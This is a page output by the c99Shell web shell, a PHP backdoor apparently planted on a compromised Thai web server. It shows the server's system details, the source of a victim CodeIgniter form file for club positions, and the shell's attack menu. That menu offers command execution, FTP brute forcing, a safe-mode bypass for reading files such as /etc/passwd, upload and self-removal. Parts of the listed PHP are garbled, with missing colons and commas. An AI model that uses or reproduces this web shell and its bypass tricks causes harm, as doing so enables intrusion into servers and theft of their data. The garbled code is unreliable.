!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/esa/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_add_smo_position.php (5.83 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
<script language="javascript" >
    $(document).ready(function(){
        var seq = $("#pos_seq").attr('value');
        if (seq =='') {
            var number = parseInt($("#table_show tr:last").children("td:first-child").text())+1 ;
            if(isNaN(number)){ number=1; }
            $("#pos_seq").attr('value',number);
        }
    });
</script>
<script language="javascript">
    function doSubmit(){

        for (var i=0; i < 2; i++)
        {
           if (document.myform.pos_status[i].checked)
           {
              var pos_status = document.myform.pos_status[i].value;
            }
        }
        document.myform.pos_status.value = pos_status;
        document.myform.submit();
    }

    function do_delete_pos(id,type){
        var answer = confirm("ต้องการลบตำแหน่งนี้ใช่หรือไม่");
        alert(answer);
        if (answer){
            alert(document.myform.action);
            alert('answer='+answer);
            document.myform.action = 'esa/base_data/del_pos';
            document.myform.pos_id.value = id;
            document.myform.pos_type.value = type;
            document.myform.submit();
        }

        return false;
    }
</script>
<?php
    $_image_reply = array(
                    'src' => 'images/edit.png',         
                    'width' => '15',
                    'height' => '15',
                    'border' => '0',
                    'title' => 'แก้ไขข้อมูล',
                    'onmouseover' => "this.style.cursor='pointer'"
    );
    $_image_del = array(
                    'src' => 'images/delete.png',         
                    'width' => '15',
                    'height' => '15',
                    'border' => '0',
                    'title' => 'ลบข้อมูล',
                    'onmouseover' => "this.style.cursor='pointer'"
    );//

//$pos = $pos_->row();
?>

<?php echo form_open($this->config->item('sa_folder').'base_data/add_smo_pos');?>
<table width="60%" align="center">
    <tr>
        <td align="center"><h3>ข้อมูลตำแหน่งในสโมสร</h3></td>
    </tr>
    <tr>
        <th align="center" colspan="2"></th>
    </tr>
    <tr>
        <td>
            <table id="table_input" class='szone2' width="40%" border="0">
                <tr >
                    <th width="20%" align="right">ลำดับ </th>
                    <td width="80%" >
                        <input type="text" name="pos_seq" id="pos_seq" value="<?php echo set_value('pos_seq',getval('pos_seq'$pos));?>" size="11" /> <font color='red'>*</font>
                        <?php echo form_error('pos_seq'); ?>
                        <?php echo isset($error_seq)? $error_seq "" ?>
                        <input type="hidden" name="pos_id" value="<?php echo set_value('pos_id',getval('pos_id'$pos));?>" />
                        <input type="hidden" name="pos_type" value="1"/>
                    </td>
                </tr>
                <tr >
                    <th >ชื่อตำแหน่ง </th>
                    <td >
                        <input type="text" name="pos_name" id="pos_name" value="<?php echo set_value('pos_name',getval('pos_name'$pos));?>" size="30" /> <font color='red'>*</font>
                        <?php echo form_error('pos_name'); ?>
                        <?php echo isset($error_name)? $error_name "" ?>
                    </td>
                </tr>
                <tr >
                    <th >จำนวน</th>
                    <td >
                        <input type="radio" name="pos_num" value="1" <?php echo (getval('pos_num',$pos)=='1')?'checked':((getval('pos_num',$pos)=='M') ? '' 'checked'); ?>/> 1 คน  &nbsp;&nbsp;
                        <input type="radio" name="pos_num" value="M" <?php echo (set_value('pos_num',getval('pos_num',$pos))=='M')?'checked':''?>/> มากกว่า 1 คน
                        <?php echo form_error('pos_num'); ?>    
                    </td>
                </tr>
                <tr >
                    <th >สถานะ</th>
                    <td>
                        <input type="radio" name="pos_status" value="Y" <?php echo (getval('pos_status',$pos)=='Y')?'checked':((getval('pos_status',$pos)=='N') ? '' 'checked'); ?>/> ใช้ &nbsp;&nbsp;&nbsp;
                        <input type="radio" name="pos_status" value="N" <?php echo (set_value('pos_status',getval('pos_status',$pos))=='N')?'checked':''?>/> ไม่ใช้
                        <?php echo form_error('pos_status'); ?>    
                    </td>
                </tr>
                <tr >
                    <td colspan="2" align="center">
            <?php echo form_error('error_name'); ?>
                    <input type="submit" name="add" value="บันทึก" /></td>
                </tr>
            </table>
        </td>
    </tr>
</table>
<br/>
<table id="table_show" class='tb_1' width="70%" border="0">
    <tr>
        <th width="10%">ลำดับที่</th>
        <th >ชื่อตำแหน่ง</th>
        <th width="10%">จำนวน</th>
        <th width="10%">สถานะ</th>
        <th width="10%">แก้ไข</th>
        <th width="5%">ลบ</th>
    </tr>
<?php 
if ($rs_pos->num_rows 0) {
    $index=1;
    foreach ($rs_pos->result() as $row) {
?>
    <tr>
        <td align="center"><?php echo $row->pos_seq;?></td>
        <td align="left"><?php echo $row->pos_name;?></td>
        <td align="center"><?php echo ($row->pos_num=='M')?'มากกว่า 1' $row->pos_num;?></td>
        <td align="center"><?php echo ($row->pos_status=='Y')?'ใช้':'ไม่ใช้';?><b></font></td>
        <td align="center"><span class="hand" onClick="sendPost('myform', {'pos_id':<?php echo $row->pos_id;?>}, 'smo_pos')"><?php echo img($this->config->item('sa_image_reply'));?></span></td>
        <td align="center"><span class="hand" onClick="if (confirm('ต้องการลบใช่หรือไม่')) { sendPost('hidform', {'pos_id':<?php echo $row->pos_id;?>,'pos_type':<?php echo $row->pos_type?>}, 'del_pos'); }"><?php echo img($this->config->item('sa_image_del'));?></td>
    </tr>
<?php 
        $index++;
    }
} else {
?>
    <tr class='notfound'>
        <td colspan="6" align="center"><?php echo $this->config->item('sa_not_found');?></td>
    </tr>
<?php 
}
?>
</table>
<?php echo form_close();?>
<br>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.012 ]--